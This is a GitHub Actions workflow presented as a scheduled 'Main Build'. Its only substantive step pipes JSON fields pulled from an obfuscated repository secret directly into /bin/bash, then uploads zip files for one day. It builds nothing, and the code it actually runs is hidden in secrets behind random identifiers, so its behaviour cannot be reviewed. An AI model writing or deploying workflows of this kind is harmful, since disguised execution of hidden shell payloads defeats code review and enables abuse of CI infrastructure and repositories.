name: Main Build
on:
  workflow_dispatch:

  schedule:
    - cron: '23 3,9,15,21 * * *'
env:
  CI: true
concurrency:
  group: ${{ github.workflow }}
  cancel-in-progress: false
jobs:
  process:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
        with:
          fetch-depth: 0
      - name: Start
        env:
          ezxqc1: ${{ secrets.ezxqc1 }}
        run: |
          printf '%s' "$ezxqc1" | jq -r .yusrq6334 | /bin/bash
          printf '%s' "$a26463" | jq -r .fk52698 | /bin/bash
          printf '%s' "$sawfs0" | jq -r .mm76 | /bin/bash
          echo $xgb7 | jq -r .vphv19234 | /bin/bash
          echo $d8423 | jq -r .sjy2820 | /bin/bash

      - name: Upload results
        uses: actions/upload-artifact@v4
        with:
          name: 57m7osvy
          path: "*.zip"
          retention-days: 1
